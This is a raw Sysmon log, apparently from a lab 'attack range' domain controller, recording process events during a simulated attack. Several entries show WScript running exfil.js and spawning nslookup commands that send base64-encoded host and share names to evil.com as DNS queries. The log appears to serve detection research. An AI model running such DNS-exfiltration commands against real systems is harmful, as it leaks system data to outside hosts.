14:16:10.025{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.025{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.025{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.025{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-2C3E-000000005F02}7832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.009{2E1864BB-17A9-629A-2A3E-000000005F02}75804232C:\Windows\system32\cmd.exe{2E1864BB-17AA-629A-2C3E-000000005F02}7832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.025{2E1864BB-17AA-629A-2C3E-000000005F02}7832C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A9-629A-2A3E-000000005F02}7580C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltoi.tmp 2>&1 10341000x8000000000000000195646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.975{2E1864BB-17AB-629A-5E3E-000000005F02}76607224C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-5F3E-000000005F02}32C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.975{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.975{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.975{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-5F3E-000000005F02}32C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.975{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.975{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.975{2E1864BB-17AB-629A-5D3E-000000005F02}76645136C:\Windows\system32\cmd.exe{2E1864BB-17AB-629A-5F3E-000000005F02}32C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.984{2E1864BB-17AB-629A-5F3E-000000005F02}32C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AB-629A-5D3E-000000005F02}7664C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhdtemy.tmp 2>&1 10341000x8000000000000000195638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.943{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-5E3E-000000005F02}7660C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.943{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-5E3E-000000005F02}7660C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.943{2E1864BB-17AB-629A-5E3E-000000005F02}76607224C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-5D3E-000000005F02}7664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.912{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-5E3E-000000005F02}7660C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.909{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-5D3E-000000005F02}7664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.909{2E1864BB-17A1-629A-783D-000000005F02}55521036C:\Windows\System32\WScript.exe{2E1864BB-17AB-629A-5D3E-000000005F02}7664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.909{2E1864BB-17AB-629A-5D3E-000000005F02}7664C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhdtemy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.890{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkljd.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.861{2E1864BB-17AB-629A-5B3E-000000005F02}40127076C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-5C3E-000000005F02}7300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.861{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.861{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.861{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 